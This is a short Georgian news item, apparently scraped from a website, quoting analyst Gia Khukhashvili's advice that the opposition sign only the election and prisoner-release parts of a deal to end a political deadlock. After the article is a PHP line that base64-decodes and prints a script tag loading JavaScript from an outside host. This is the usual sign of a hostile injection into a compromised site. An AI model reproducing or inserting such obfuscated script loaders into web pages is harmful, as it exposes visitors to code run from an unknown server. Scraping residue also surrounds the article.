celsiusi
ავერსი საქკაბელი
კარგია, რომ ჩიხიდან გამოსვლის კონტურები გამოიკვეთა. ცუდია, რომ გაჯიქება რომ არა, ამ შედეგის მიღწევა 3-4 თვის წინაც შეიძლებოდა და ეს ქვეყნისთვის დაკარგული დროა, - ამის შესახებ ექსპერტი გია ხუხაშვილი საკუთარ სოციალურ გვერდზე წერს. 
 
"მე მაინც ვურჩევდი ოპოზიციას, რომ ხელი მოაწეროს მხოლოდ არჩევნებთან დაკავშირებულ საკითხებს და პატიმრების გათავისუფლებას. უნდა თქვან, რომ ისინი კვლავაც არ აღიარებენ არჩევნების შედეგებს, მაგრამ ითვალისწინებენ სახელმწიფო ინტერესებს და იღებენ დე-ფაქტო მოცემულობას", - წერს გია ხუხაშვილი. 
 
"შესაბამისად: უარს აცხადებენ საპარლამენტო და სხვა თანამდებობებზე. აგრეთვე უარს ამბობენ მართლმსაჯულების და სხვა სისტემების რეფორმებზე, რადგან ამ ხელისუფლების პირობებში სისტემური რეფორმების ჩატარება შეუძლებლად მიაჩნიათ. ამით ხაზი გაესმება იმას, რომ ისინი ამ ნაბიჯს დგამენ სახელმწიფო ინტერესებიდან გამომდინარე და არა იმიტომ, რომ კრიზისი გადალახულია. უბრალოდ იცვლება კრიზისის ფორმატი", - განმარტავს გია ხუხაშვილი. 
1198
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");